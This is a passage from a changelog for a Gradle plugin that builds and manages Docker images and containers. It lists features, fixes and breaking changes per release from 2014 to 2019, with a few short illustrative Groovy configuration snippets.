warnings - {uri-github}\/issues\/782[Issue 782]\n* Bump `docker-java` to `3.1.2` - {uri-github}\/issues\/787[Issue 787]\n\n[discrete]\n=== v4.6.2 (March 9, 2019)\n\n* Add shaded JAF dependency to simplify usage of plugin with Java 11 - {uri-github}\/issues\/764[Issue 764]\n\n[discrete]\n=== v4.6.1 (March 6, 2019)\n\n* Fix setting binds in `DockerCreateContainer` task - {uri-github}\/issues\/758[Issue 758]\n\n[discrete]\n=== v4.6.0 (March 3, 2019)\n\n* **Breaking Change!** Plugin declares and uses Docker Java as runtime library - {uri-github}\/pull\/751[PR 751]\n* **Breaking Change!** Custom task `DockerClient` has been renamed to `DockerOperation` to avoid conflicting Docker Java class name\n* Shade plugin dependencies except Docker Java - {uri-github}\/pull\/755[PR 755]\n\n[discrete]\n=== v4.5.0 (February 19, 2019)\n\n* `Dockerfile.FileInstruction` does not use flags if `Dockerfile.File` is passed in using a `Provider` - {uri-github}\/pull\/753[PR 753]\n* Inline main class finder and avoid explicit dependency on Spring Boot - {uri-github}\/pull\/752[PR 752]\n\n[discrete]\n=== v4.4.1 (February 5, 2019)\n\n* Cannot set publishAll property without error - {uri-github}\/pull\/742[PR 742]\n\n[discrete]\n=== v4.4.0 (January 31, 2019)\n\n* **Breaking Change!** Define image with more fine-grained image layers - {uri-github}\/pull\/736[PR 736]\n* Bump _docker-java-shaded_ to latest version - {uri-github}\/pull\/729[PR 729]\n* Task `DockerCreateContainer` gained option `groups` - {uri-github}\/pull\/731[Pull Request 731]\n\n[discrete]\n=== v4.3.0 (January 12, 2019)\n\n* **Breaking Change!** The task `DockerLoadImage` should use `Provider` type for image file\n* **Breaking Change!** Use the default value `$buildDir\/docker` for `DockerBuildImage.inputDir` to align with the default directory of the `Dockerfile` task\n* **Breaking Change!** Align task names in `DockerJavaApplicationPlugin` with the ones from the `DockerSpringBootApplicationPlugin`\n* Examples in user guide that demonstrate the creation of a custom Docker task and the modification of existing `Dockerfile` instructions\n\n[discrete]\n=== v4.2.0 (December 16, 2018)\n\n* Applying the Docker Spring Boot application plugin with the plugins DSL should not fail - {uri-github}\/issues\/702[Issue 702]\n* **Breaking Change!** Remove all deprecations - {uri-github}\/issues\/675[Issue 675]\n** Removed `DockerCreateContainer.env`, replaced by `DockerCreateContainer.envVars`\n** Removed `DockerBuildImage.tag`, replaced by `DockerBuildImage.tags`\n** Removed `DockerExecContainer.cmd`, replaced by `DockerExecContainer.commands`\n** Removed `DockerExecContainer.execId`, replaced by `DockerExecContainer.execIds`\n* `DockerBuildImage.tags.add\/addAll` only work after using `tags.set` - {uri-github}\/issues\/712[Issue 712]\n* User guide sample on Docker `links` should not use `doFirst` - {uri-github}\/issues\/715[Issue 715]\n* `DockerCommitImage` task should not fail when accessing container ID property value - {uri-github}\/issues\/718[Issue 718]\n\n[discrete]\n=== v4.1.0 (November 29, 2018)\n\n* Ensure compatibility with Gradle 5.0 - {uri-github}\/pull\/693[Pull Request 709]\n* **Breaking Change!** The existing field `timeout` in custom tasks had to be renamed due to https:\/\/docs.gradle.org\/5.0\/userguide\/more_about_tasks.html#sec:task_timeouts[Gradle's 5.0 built-in timeout feature]\n\n[discrete]\n=== v4.0.5 (November 22, 2018)\n\n* Avoid the use of application plugin extension to ensure compatibility - {uri-github}\/issues\/706[Issue 
706]\n\n[discrete]\n=== v4.0.4 (November 4, 2018)\n\n* Implementation to make `DockerBuildImage` task incremental and cacheable is not sufficient - {uri-github}\/issues\/697[Issue 697]\n\n[discrete]\n=== v4.0.3 (October 30, 2018)\n\n* Correctly handle the case where `inputDir` is not where `dockerFile` is located - {uri-github}\/pull\/693[Pull Request 693]\n\n[discrete]\n=== v4.0.2 (October 27, 2018)\n\n* Output file name containing the image ID created by `DockerBuildImage` should work on Windows - {uri-github}\/pull\/690[Pull Request 690]\n\n[discrete]\n=== v4.0.1 (October 20, 2018)\n\n* Returned image ID for a `DockerBuildImage` task should never be null - {uri-github}\/pull\/687[Pull Request 687]\n\n[discrete]\n=== v4.0.0 (October 12, 2018)\n\n* **Breaking Change!** Use `Provider` concept throughout to support lazy evaluation via public API - {uri-github}\/pull\/659[Pull Request 659]\n* **Breaking Change!** Consumers of this plugin will have to use Java 8 or higher - {uri-github}\/pull\/676[Pull Request 676]\n* **Breaking Change!** Removal of `AbstractReactiveStreamsTask` from inherited custom task hierarchy\n* __NEW__ Add tested, multi-lingual user guide - {uri-github}\/pull\/677[Pull Request 677]\n* __NEW__ Make `DockerBuildImage` task incremental and cacheable - {uri-github}\/pull\/672[Pull Request 672]\n* Introduce method for translating username\/password into a PasswordCredentials - {uri-github}\/pull\/668[Pull Request 668]\n* Add `@CompileStatic` to much of the code base that can support it - {uri-github}\/pull\/676[Pull Request 676]\n* Use appropriate types for Groovy\/Kotlin DSL interoperability for reactive streams functionality - {uri-github}\/pull\/678[Pull Request 678]\n\n[discrete]\n=== v3.6.2 (October 2, 2018)\n\n* `DockerCreateContainer` gained `pid` option - {uri-github}\/pull\/652[Pull Request 652]\n* `Dockerfile` validation takes into account comments - {uri-github}\/issues\/657[Issue 657]\n* Bump `docker-java-shaded` to `rc-5` - {uri-github}\/issues\/660[Issue 660]\n* `DockerBuildImage` gained `network` option - {uri-github}\/issues\/608[Issue 608]\n* `DockerCreateContainer` gained `autoRemove` option - {uri-github}\/issues\/639[Issue 639]\n\n[discrete]\n=== v3.6.1 (August 21, 2018)\n\n* Task `DockerClient`, and the passed dockerClient object, is now cached by configuration - {uri-github}\/pull\/644[Pull Request 644]\n* Task `DockerBuildImage` gained option `cacheFrom` - {uri-github}\/pull\/646[Pull Request 646]\n\n[discrete]\n=== v3.6.0 (August 7, 2018)\n\n* Use smaller base images for convention plugins - {uri-github}\/pull\/636[Pull Request 636]\n* Fully deprecate MAINTAINER instruction and replace with LABEL - {uri-github}\/pull\/635[Pull Request 635]\n* Make Dockerfile task cacheable via Gradle build cache - {uri-github}\/pull\/641[Pull Request 641]\n\n[discrete]\n=== v3.5.0 (July 24, 2018)\n\n* Support for dockerizing Spring Boot applications - {uri-github}\/pull\/619[Pull Request 619]\n* Removed deprecated `ResponseHandler` - {uri-github}\/pull\/624[Pull Request 624]\n* Introduce user guide for more readable, maintainable documentation - {uri-github}\/pull\/630[Pull Request 630]\n* Upgrade to Gradle Wrapper 4.9\n\n[discrete]\n=== v3.4.4 (July 15, 2018)\n\n* Task `DockerLivenessContainer` had its polling logic reworked to be more failure proof.\n\n[discrete]\n=== v3.4.3 (July 8, 2018)\n\n* Task `DockerCreateContainer` has its method `withEnvVars` changed to accept a `def`, which in turn can be anything (String, Integer, Closure, etc) but will eventually have 
all its keys\/values resolved to java strings. - {uri-github}\/pull\/616[Pull Request 617]\n* Task `DockerLivenessContainer` had minor verbiage changes to its output. - {uri-github}\/pull\/616[Pull Request 617]\n* Use `-all` wrapper to better integrate with IDEs. - {uri-github}\/pull\/616[Pull Request 617]\n\n[discrete]\n=== v3.4.2 (July 7, 2018)\n\n* Shade cglib and its dependencies. - {uri-github}\/pull\/616[Pull Request 616]\n* Bump `docker-java` to `3.1.0-rc-3`. - {uri-github}\/pull\/616[Pull Request 616]\n\n[discrete]\n=== v3.4.1 (July 3, 2018)\n\n* BUGFIX for task `DockerCreateContainer` where `envs` were not being properly honored. - {uri-github}\/pull\/614[Pull Request 614]\n\n[discrete]\n=== v3.4.0 (July 1, 2018)\n\n* Task `Dockerfile` now supports multi-stage builds - {uri-github}\/pull\/607[Pull Request 607]\n* When plugin is applied to sub-projects we will additionally search rootProject for repos to use - {uri-github}\/pull\/610[Pull Request 610]\n* Task `DockerCreateContainer` has deprecated `env` in favor of `envVars` which can ONLY be added to with a helper method `withEnvVar` that can be called **N** times for setting environment variables. - {uri-github}\/pull\/609[Pull Request 609]\n* Task `DockerLivenessProbeContainer` has been renamed to `DockerLivenessContainer`. Its `probe` method has been renamed to `livnessProbe`. Task `DockerExecStopContainer` had its `probe` method renamed to `execStopProbe`. - {uri-github}\/pull\/611[Pull Request 611]\n\n[discrete]\n=== v3.3.6 (June 23, 2018)\n\n* Task `DockerCopyFileToContainer` can now copy **N** number of files via methods `withFile` and `withTarFile`. - {uri-github}\/pull\/605[Pull request 605]\n\n[discrete]\n=== v3.3.5 (June 17, 2018)\n\n* Fix bug within `DockerExecContainer` when `exitCode` can be null (default to 0 if so). - {uri-github}\/pull\/602[Pull request 602]\n\n[discrete]\n=== v3.3.4 (June 16, 2018)\n\n* Task `DockerExecContainer` gained ability to specify multiple execution commands to be run. - {uri-github}\/pull\/600[Pull request 600]\n* Various tasks had their progress logger output cleaned up. - {uri-github}\/pull\/601[Pull request 601]\n\n[discrete]\n=== v3.3.3 (June 8, 2018)\n\n* Explicitly call `toString()` on values in maps passed to Docker API. - {uri-github}\/pull\/595[Pull request 595]\n* Task `DockerLivenessProbeContainer` gained method `lastInspection()` which will return the last \"docker inspect container\" response AFTER execution has completed. - {uri-github}\/pull\/596[Pull request 596]\n\n[discrete]\n=== v3.3.2 (June 5, 2018)\n\n* Task `DockerLivenessProbeContainer` now has the `probe` option set to optional and if NOT defined will fall back to checking if container is in a running state. - {uri-github}\/pull\/594[Pull request 594]\n\n[discrete]\n=== v3.3.1 (June 2, 2018)\n\n* Various minor refactorings surrounding new task `DockerExecStopContainer`. - {uri-github}\/pull\/592[Pull request 592]\n\n[discrete]\n=== v3.3.0 (June 1, 2018)\n\n* Added task `DockerClient` to pass the raw `docker-java` client to the `onNext` closure if defined. - {uri-github}\/pull\/589[Pull request 589]\n* Task `DockerCreateContainer` will now log the `containerName` if set, which is the standard within this plugin, otherwise fall back to the just created `containerId`.\n* Task `DockerExecContainer` gained option `successOnExitCodes` to allow the user to define a list of successful exit codes the exec is allowed to return and will fail if not in the list. Default behavior is to do no check. 
- {uri-github}\/pull\/590[Pull request 590]\n* Added task `DockerLivenessProbeContainer` which will poll, for some defined amount of time, a running container's logs looking for a given message and fail if not found. - {uri-github}\/pull\/587[Pull request 587]\n* Added task `DockerExecStopContainer` to allow the user to execute an arbitrary cmd against a container, polling for it to enter a non-running state, and if that does not succeed in time, issue a stop request. - {uri-github}\/pull\/591[Pull request 591]\n\n[discrete]\n=== v3.2.9 (May 22, 2018)\n\n* Fixed a bug in task `DockerCreateContainer` where option `cpuset` is now named differently in `docker-java`. - {uri-github}\/pull\/585[Pull request 585]\n\n[discrete]\n=== v3.2.8 (April 30, 2018)\n\n* Task `DockerExecContainer` gained option `user` to specify a user\/group. - {uri-github}\/pull\/574[Pull request 574]\n* Task `DockerCreateContainer` gained option `ipV4Address` to specify a specific ipv4 address to use. - {uri-github}\/pull\/449[Pull request 449]\n* Bump gradle to `4.7`. - {uri-github}\/pull\/578[Pull request 578]\n\n[discrete]\n=== v3.2.7 (April 19, 2018)\n\n* Task `DockerSaveImage` gained option `useCompression` to optionally gzip the created tar. - {uri-github}\/pull\/565[Pull request 565]\n* Add `javax.activation` dependency for users who are working with jdk9+. - {uri-github}\/pull\/572[Pull request 572]\n\n[discrete]\n=== v3.2.6 (March 31, 2018)\n\n* Cache `docker-java` client instead of recreating for every request\/task invocation. This is a somewhat big internal change but has a lot of consequences and so it was deserving of its own point release. - {uri-github}\/pull\/558[Pull request 558]\n\n[discrete]\n=== v3.2.5 (March 2, 2018)\n\n* Added `macAddress` option to task `DockerCreateContainer` - {uri-github}\/pull\/538[Pull request 538]\n* Initial work for `codenarc` analysis - {uri-github}\/pull\/537[Pull request 537]\n* Use of `docker-java-shaded` library in favor of `docker-java` proper to get around class-loading\/clobbering issues - {uri-github}\/pull\/550[Pull request 550]\n* Honor DOCKER_CERT_PATH env var if present - {uri-github}\/pull\/549[Pull request 549]\n* Task `DockerSaveImage` will now create the file for you should it not exist - {uri-github}\/pull\/552[Pull request 552]\n* Task `DockerPushImage` will now include tag info in logging if applicable - {uri-github}\/pull\/554[Pull request 554]\n* !!!!! BREAKING: Property `inputStream` of task `DockerLoadImage` has been changed from type `InputStream` to `Closure<InputStream>`. This was done to allow scripts\/code\/pipelines to delay getting the image and side-step this property getting configured during Gradle's config phase. 
- {uri-github}\/pull\/552[Pull request 552]\n\n[discrete]\n=== v3.2.4 (February 5, 2018)\n\n* Use openjdk as a default image in DockerJavaApplicationPlugin - {uri-github}\/pull\/528[Pull request 528]\n* Add `skipMaintainer` to `DockerJavaApplication` - {uri-github}\/pull\/529[Pull request 529]\n* Can now define `labels` in `DockerCreateContainer` task - {uri-github}\/pull\/530[Pull request 530]\n* Added task `DockerRenameContainer` - {uri-github}\/pull\/533[Pull request 533]\n\n[discrete]\n=== v3.2.3 (January 26, 2018)\n\n* If `DockerWaitHealthyContainer` is run on an image which was not built with `HEALTHCHECK` then fall back to using the generic status - {uri-github}\/pull\/520[Pull request 520]\n\n[discrete]\n=== v3.2.2 (January 17, 2018)\n\n* Bump gradle to `4.3.1` - {uri-github}\/pull\/500[Pull request 500]\n* Bug fix for {uri-github}\/issues\/490[Issue 490] wherein `on*` reactive-stream closures are evaluated with null exception when using gradle-4.3 - {uri-github}\/commit\/93b80f2bd18c4f04d0f58443b45c59cb58a54e77[Commit 93b80f]\n* Support for zero exposed ports in `DockerJavaApplication` - {uri-github}\/pull\/504[Pull request 504]\n\n[discrete]\n=== v3.2.1 (November 22, 2017)\n\n* Bump gradle to `4.2` - {uri-github}\/pull\/471[Pull request 471]\n* Fix setting `shmSize` when creating container - {uri-github}\/pull\/480[Pull request 480]\n* Add support for entrypoint on `DockerCreateContainer` - {uri-github}\/pull\/479[Pull request 479]\n* Bump version of docker-java to 3.0.14 - {uri-github}\/pull\/482[Pull request 482]\n* Added `DockerWaitHealthyContainer` task - {uri-github}\/pull\/485[Pull request 485]\n* Use groovy join function in favor of jdk8 join function. - {uri-github}\/pull\/498[Pull request 498]\n\n[discrete]\n=== v3.2.0 (September 29, 2017)\n\n* Update `createBind` to use docker-java `parse` method - {uri-github}\/pull\/452[Pull request 452]\n* Allow Docker to cache app libraries dir when `DockerJavaApplication` plugin is used - {uri-github}\/pull\/459[Pull request 459]\n\n[discrete]\n=== v3.1.0 (August 21, 2017)\n\n* `DockerListImages` gained better support for filters - {uri-github}\/pull\/414[Pull request 414]\n* Use `alpine:3.4` image in functional tests - {uri-github}\/pull\/416[Pull request 416]\n* `DockerBuildImage` and `DockerCreateContainer` gained optional argument `shmSize` - {uri-github}\/pull\/413[Pull request 413]\n* Added tasks `DockerInspectNetwork`, `DockerCreateNetwork`, and `DockerRemoveNetwork` - {uri-github}\/pull\/422[Pull request 422]\n* Add statically typed methods for configuring plugin with Kotlin - {uri-github}\/pull\/426[Pull request 426]\n* Fix `Dockerfile` task up-to-date logic - {uri-github}\/pull\/433[Pull request 433]\n* Multiple ENVs are not set the same way as single ENV instructions - {uri-github}\/pull\/415[Pull request 415]\n* `DockerCreateContainer` changed optional input `networkMode` to `network` to better align with docker standards - {uri-github}\/pull\/440[Pull request 440]\n* The first instruction of a Dockerfile has to be FROM except for Docker versions later than 17.05 - {uri-github}\/pull\/435[Pull request 435]\n* Bump version of docker-java to 3.0.13 - {uri-github}\/commit\/b2d93671ed0a0b7177a450d503c28eca6aa6795d[Commit b2d936]\n\n[discrete]\n=== v3.0.10 (July 7, 2017)\n\n* Bump version of docker-java to 3.0.12 - {uri-github}\/pull\/408[Pull request 408]\n* Publish javadocs on new release - {uri-github}\/pull\/405[Pull request 405]\n\n[discrete]\n=== v3.0.9 (July 4, 2017)\n\n* Bump version of docker-java to 3.0.11 - 
{uri-github}\/pull\/403[Pull request 403]\n* New release process - {uri-github}\/pull\/402[Pull request 402]\n\n[discrete]\n=== v3.0.8 (June 16, 2017)\n\n* Task `DockerPullImage` gained method `getImageId()` which returns the fully qualified imageId of the image that was just pulled - {uri-github}\/pull\/379[Pull request 379]\n* Task `DockerBuildImage` gained property `tags` which allows for multiple tags to be specified when building an image - {uri-github}\/pull\/380[Pull request 380]\n* Task `DockerCreateContainer` gained property `networkAliases` - {uri-github}\/pull\/384[Pull request 384]\n\n[discrete]\n=== v3.0.7 (May 17, 2017)\n\n* Invoke the onNext closure's call() method explicitly - {uri-github}\/pull\/368[Pull request 368]\n* Added new task `DockerInspectExecContainer`, which allows inspecting an exec instance - {uri-github}\/pull\/362[Pull request 362]\n* `functionalTest` tasks can now run against a native docker instance - {uri-github}\/pull\/369[Pull request 369]\n* `DockerLogsContainer` now preserves leading space - {uri-github}\/pull\/370[Pull request 370]\n* Allow customization of app plugin entrypoint\/cmd instructions - {uri-github}\/pull\/359[Pull request 359]\n* Task `Dockerfile` will no longer be forced as `UP-TO-DATE`; instead, the onus will be put on developers to code this should they want this functionality. - {uri-github}\/issues\/357[Issue 357]\n* Now that `functionalTest` tasks work natively, and in CI, add the test `started`, `passed` and `failed` logging messages so as to make it absolutely clear to users what is being run vs having no output at all. - {uri-github}\/pull\/373[Pull request 373]\n* Bump `docker-java` to v`3.0.10` - {uri-github}\/pull\/378[Pull request 378]\n\n[discrete]\n=== v3.0.6 (March 2, 2017)\n\n* Bump version of docker-java to 3.0.7 - {uri-github}\/pull\/331[Pull request 331]\n* Add support for label parameter on docker image creation - {uri-github}\/pull\/332[Pull request 332]\n\n[discrete]\n=== v3.0.5 (December 27, 2016)\n\n* Support multiple variables per single ENV cmd - {uri-github}\/pull\/311[Pull request 311]\n* Implement a sane default docker URL based on environment - {uri-github}\/pull\/313[Pull request 313]\n* Implement https:\/\/github.com\/reactive-streams\/reactive-streams-jvm\/#2-subscriber-code[reactive-stream] methods `onNext` and `onComplete` for all tasks (see the sketch below) - {uri-github}\/pull\/307[Pull request 307]\n\n[discrete]\n=== v3.0.4 (December 1, 2016)\n\n* Implement https:\/\/github.com\/reactive-streams\/reactive-streams-jvm\/#2-subscriber-code[reactive-stream] method `onError` for all tasks - {uri-github}\/pull\/302[Pull request 302]\n* Bump docker-java to 3.0.6 - {uri-github}\/pull\/279[Pull request 279]
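\n\nA hypothetical illustration of the reactive-stream closures described above (task name, import path, field access and log messages are illustrative, not taken from this changelog):\n\n[source,groovy]\n----\nimport com.bmuschko.gradle.docker.tasks.image.DockerListImages\n\ntask listImages(type: DockerListImages) {\n    onNext { image ->\n        \/\/ invoked once per item the task emits\n        logger.quiet 'Found image: ' + image.id\n    }\n    onError { error ->\n        \/\/ invoked if the remote API call fails\n        logger.error 'Docker call failed: ' + error.message\n    }\n    onComplete {\n        logger.quiet 'Listing complete.'\n    }\n}\n----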
\n\n[discrete]\n=== v3.0.3 (September 6, 2016)\n\n* Print error messages received from docker engine when build fails - {uri-github}\/pull\/265[Pull request 265]\n* Bump docker-java to 3.0.5 - {uri-github}\/pull\/263[Pull request 263]\n* Add support for `force` removal on `DockerRemoveImage` - {uri-github}\/pull\/266[Pull request 266]\n* Various fixes and cleanups, as well as defaulting to the alpine image for all functional tests - {uri-github}\/pull\/269[Pull request 269]\n* Added `editorconfig` file with some basic defaults - {uri-github}\/pull\/270[Pull request 270]\n\n[discrete]\n=== v3.0.2 (August 14, 2016)\n\n* Add support for build-time variables in `DockerBuildImage` task - {uri-github}\/pull\/240[Pull request 240]\n* Fix incorrect docker-java method name in `DockerCreateContainer` task - {uri-github}\/pull\/242[Pull request 242]\n* Can define devices on `DockerCreateContainer` task - {uri-github}\/pull\/245[Pull request 245]\n* Can now supply multiple ports when working with `docker-java-application` - {uri-github}\/pull\/254[Pull request 254]\n* Bump docker-java to 3.0.2 - {uri-github}\/pull\/259[Pull request 259]\n* If buildscript repos are required make sure they are added after evaluation - {uri-github}\/pull\/260[Pull request 260]\n\n[discrete]\n=== v3.0.1 (July 6, 2016)\n\n* Simplify Gradle TestKit usage - {uri-github}\/pull\/225[Pull request 225]\n* Ensure `tlsVerify` is set in addition to `certPath` for DockerClientConfig setup - {uri-github}\/pull\/230[Pull request 230]\n* Upgrade to Gradle 2.14.\n\n[discrete]\n=== v3.0.0 (June 5, 2016)\n\n* Task `DockerLogsContainer` gained attribute `sink` - {uri-github}\/pull\/203[Pull request 203]\n* Task `DockerBuildImage` will no longer insert extra newline as part of build output - {uri-github}\/pull\/206[Pull request 206]\n* Upgrade to docker-java 3.0.0 - {uri-github}\/pull\/217[Pull request 217]\n* Fallback to buildscript.repositories for internal dependency resolution if no repositories were defined - {uri-github}\/pull\/218[Pull request 218]\n* Added task `DockerExecContainer` - {uri-github}\/pull\/221[Pull request 221]\n* Added task `DockerCopyFileToContainer` - {uri-github}\/pull\/222[Pull request 222]\n* Task `DockerCreateContainer` gained attribute `restartPolicy` - {uri-github}\/pull\/224[Pull request 224]\n* Remove use of Gradle internal methods.\n* Added ISSUES.md file.\n* Upgrade to Gradle 2.13.\n\n[discrete]\n=== v2.6.8 (April 10, 2016)\n\n* Added task `DockerLogsContainer` - {uri-github}\/pull\/181[Pull request 181]\n* Bump docker-java to v2.3.3 - {uri-github}\/pull\/183[Pull request 183]\n* Bug fix for not checking whether the parent dir already exists before creating it with `DockerCopyFileToContainer` - {uri-github}\/pull\/186[Pull request 186]\n* `DockerWaitContainer` now produces exitCode - {uri-github}\/pull\/189[Pull request 189]\n* `apiVersion` can now be set on `DockerExtension` and overridden on all tasks - {uri-github}\/pull\/182[Pull request 182]\n* Internal fix where task variables had to be defined - {uri-github}\/pull\/194[Pull request 194]\n\n[discrete]\n=== v2.6.7 (March 10, 2016)\n\n* Upgrade to Gradle 2.11.\n* Bug fix when copying single file from container and hostPath is set to directory for `DockerCopyFileFromContainer` - {uri-github}\/pull\/163[Pull request 163]\n* Step reports are now printed to stdout by default for `DockerBuildImage` - {uri-github}\/pull\/145[Pull request 145]\n* UP-TO-DATE functionality has been removed from `DockerBuildImage` as there were too many corner cases to account for - {uri-github}\/pull\/172[Pull request 172]\n\n[discrete]\n=== v2.6.6 (February 27, 2016)\n\n* Added docker step reports for `DockerBuildImage` - {uri-github}\/pull\/145[Pull request 145]\n* Added `onlyIf` check for `DockerBuildImage` - {uri-github}\/pull\/139[Pull request 139]\n* Added method logConfig for `DockerCreateContainer` - {uri-github}\/pull\/157[Pull request 157]\n* Various commands can now be passed closures for `Dockerfile` - {uri-github}\/pull\/155[Pull request 155]\n* Fix implementation of exposedPorts for `DockerCreateContainer` - {uri-github}\/pull\/140[Pull request 140]\n* Upgrade to Docker Java 2.2.2 - {uri-github}\/pull\/158[Pull request 158].\n\n[discrete]\n=== v2.6.5 (January 16, 2016)\n\n* Fix implementation of `DockerCopyFileFromContainer` - {uri-github}\/pull\/135[Pull request 135].\n* Add `networkMode` property to `DockerCreateContainer` - {uri-github}\/pull\/114[Pull request 114].\n* Upgrade to Docker Java 2.1.4 - {uri-github}\/issues\/138[Issue 138].
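\n\nA short, hypothetical usage sketch of the new `networkMode` property (image name and import path are illustrative):\n\n[source,groovy]\n----\nimport com.bmuschko.gradle.docker.tasks.container.DockerCreateContainer\n\ntask createContainer(type: DockerCreateContainer) {\n    targetImageId 'alpine:3.4'\n    networkMode = 'bridge'  \/\/ e.g. bridge, host, none, or a user-defined network\n}\n----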
\n\n[discrete]\n=== v2.6.4 (December 24, 2015)\n\n* Expose privileged property on `DockerCreateContainer` - {uri-github}\/pull\/130[Pull request 130].\n\n[discrete]\n=== v2.6.3 (December 23, 2015)\n\n* Expose force and removeVolumes properties on `DockerRemoveContainer` - {uri-github}\/pull\/129[Pull request 129].\n\n[discrete]\n=== v2.6.2 (December 22, 2015)\n\n* Expose support for LogDriver on `DockerCreateContainer` - {uri-github}\/pull\/118[Pull request 118].\n* Upgrade to Docker Java 2.1.2.\n\n[discrete]\n=== v2.6.1 (September 21, 2015)\n\n* Correct the `withVolumesFrom` call on `DockerCreateContainer` task, which needs to receive a `VolumesFrom[]` array as the parameter - {uri-github}\/pull\/102[Pull request 102].\n* Upgrade to Docker Java 2.1.1 - {uri-github}\/pull\/109[Pull request 109].\n\n[discrete]\n=== v2.6 (August 30, 2015)\n\n* Upgrade to Docker Java 2.1.0 - {uri-github}\/pull\/92[Pull request 92].\n_Note:_ The Docker Java API changed vastly with v2.0.0. The tasks `DockerBuildImage`, `DockerPullImage` and\n`DockerPushImage` do not provide a response handler anymore. This is a breaking change. Future versions of the plugin\nmight open up the response handling again in some way.\n* `DockerListImages` with `filter` calls a wrong function from `ListImagesCmdImpl.java` - {uri-github}\/issues\/105[Issue 105].\n\n[discrete]\n=== v2.5.2 (August 15, 2015)\n\n* Fix listImages task throwing GroovyCastException - {uri-github}\/issues\/96[Issue 96].\n* Add support for publishAll in DockerCreateContainer - {uri-github}\/pull\/94[Pull request 94].\n* Add optional dockerFile option to the DockerBuildImage task - {uri-github}\/pull\/47[Pull request 47].\n\n[discrete]\n=== v2.5.1 (July 29, 2015)\n\n* Added Dockerfile support for the LABEL instruction - {uri-github}\/pull\/86[Pull request 86].\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v1.4.0. The underlying API no longer provides\nsetting port bindings for task `DockerStartContainer`; they need to be set on `DockerCreateContainer`.
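\n\nA minimal, hypothetical example of the LABEL support added in v2.5.1 (label keys, values and the import path are illustrative):\n\n[source,groovy]\n----\nimport com.bmuschko.gradle.docker.tasks.image.Dockerfile\n\ntask createDockerfile(type: Dockerfile) {\n    from 'alpine:3.4'\n    \/\/ rendered as a LABEL instruction in the generated Dockerfile\n    label(['maintainer': 'Jane Doe', 'version': '1.0'])\n}\n----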
\n\n[discrete]\n=== v2.5 (July 18, 2015)\n\n* Expose response handler for `DockerListImages` task - {uri-github}\/issues\/75[Issue 75].\n* Pass in credentials when building an image - {uri-github}\/issues\/76[Issue 76].\n\n[discrete]\n=== v2.4.1 (July 4, 2015)\n\n* Add `extraHosts` property to task `DockerCreateContainer` - {uri-github}\/pull\/79[Pull request 79].\n* Add `pull` property to task `DockerBuildImage` - {uri-github}\/pull\/78[Pull request 78].\n\n[discrete]\n=== v2.4 (May 16, 2015)\n\n* Added missing support for properties `portBindings` and `cpuset` in `CreateContainer` - {uri-github}\/pull\/66[Pull request 66].\n* Expose response handlers so users can inject custom handling logic - {uri-github}\/issues\/65[Issue 65].\n* Upgrade to Gradle 2.4 including all compatible plugins and libraries.\n\n[discrete]\n=== v2.3.1 (April 25, 2015)\n\n* Added support for `Binds` when creating containers - {uri-github}\/pull\/54[Pull request 54].\n* Added task for copying files from a container to a host - {uri-github}\/pull\/57[Pull request 57].\n\n[discrete]\n=== v2.3 (April 18, 2015)\n\n* Added task `DockerInspectContainer` - {uri-github}\/pull\/44[Pull request 44].\n* Added property `containerName` to task `DockerCreateContainer` - {uri-github}\/pull\/44[Pull request 44].\n* Allow for linking containers for task `DockerCreateContainer` - {uri-github}\/pull\/53[Pull request 53].\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v1.2.0.\n\n[discrete]\n=== v2.2 (April 12, 2015)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v1.1.0.\n\n[discrete]\n=== v2.1 (March 24, 2015)\n\n* Renamed property `registry` to `registryCredentials` for plugin extension and tasks implementing `RegistryCredentialsAware` to better indicate its purpose.\n_Note:_ This is a breaking change.\n\n[discrete]\n=== v2.0.3 (March 20, 2015)\n\n* Allow for specifying port bindings for container start command. - {uri-github}\/issues\/30[Issue 30].\n* Throw an exception if an error response is encountered - {uri-github}\/issues\/37[Issue 37].\n* Upgrade to Gradle 2.3.\n\n[discrete]\n=== v2.0.2 (February 19, 2015)\n\n* Set source and target compatibility to Java 6 - {uri-github}\/issues\/32[Issue 32].\n\n[discrete]\n=== v2.0.1 (February 10, 2015)\n\n* Extension configuration method for `DockerJavaApplicationPlugin` needs to be registered via extension instance - {uri-github}\/issues\/28[Issue 28].\n\n[discrete]\n=== v2.0 (February 4, 2015)\n\n* Upgrade to Gradle 2.2.1 including all compatible plugins and libraries.\n\n[discrete]\n=== v0.8.3 (February 4, 2015)\n\n* Add project group to default tag built by Docker Java application plugin - {uri-github}\/issues\/25[Issue 25].\n\n[discrete]\n=== v0.8.2 (January 30, 2015)\n\n* Expose method for task `Dockerfile` for providing vanilla Docker instructions.\n\n[discrete]\n=== v0.8.1 (January 24, 2015)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.10.5.\n* Correctly create model instances for create container task - {uri-github}\/issues\/19[Issue 19].\n\n[discrete]\n=== v0.8 (January 7, 2015)\n\n* Allow for pushing to Docker Hub - {uri-github}\/issues\/18[Issue 18].\n* Better handling of API responses.\n* Note: Change to plugin extension. The property `docker.serverUrl` is now called `docker.url`. Instead of `docker.credentials`, you will need to use `docker.registry`.
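\n\nA hypothetical sketch of the renamed extension properties (the URL value is illustrative):\n\n[source,groovy]\n----\ndocker {\n    url = 'tcp:\/\/localhost:2375'  \/\/ formerly docker.serverUrl\n    \/\/ registry credentials now live under docker.registry (formerly docker.credentials)\n}\n----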
\n\n[discrete]\n=== v0.7.2 (December 23, 2014)\n\n* `Dockerfile` task is always marked UP-TO-DATE after first execution - {uri-github}\/issues\/13[Issue 13].\n* Improvements to `Dockerfile` task - {uri-github}\/pull\/16[Pull request 16].\n * Fixed wrong assignment of key field in environment variable instruction.\n * Allow for providing multiple ports to the expose instruction.\n\n[discrete]\n=== v0.7.1 (December 16, 2014)\n\n* Fixed entry point definition of Dockerfile set by Java application plugin.\n\n[discrete]\n=== v0.7 (December 14, 2014)\n\n* Allow for properly adding user-based instructions to the `Dockerfile` task with predefined instructions without messing up the order. - {uri-github}\/issues\/12[Issue 12].\n* Renamed task `dockerCopyDistTar` to `dockerCopyDistResources` to better express intent.\n\n[discrete]\n=== v0.6.1 (December 11, 2014)\n\n* Allow for setting path to certificates for communicating with Docker over SSL - {uri-github}\/issues\/10[Issue 10].\n\n[discrete]\n=== v0.6 (December 7, 2014)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.10.4.\n* Added Docker Java application plugin.\n* Better 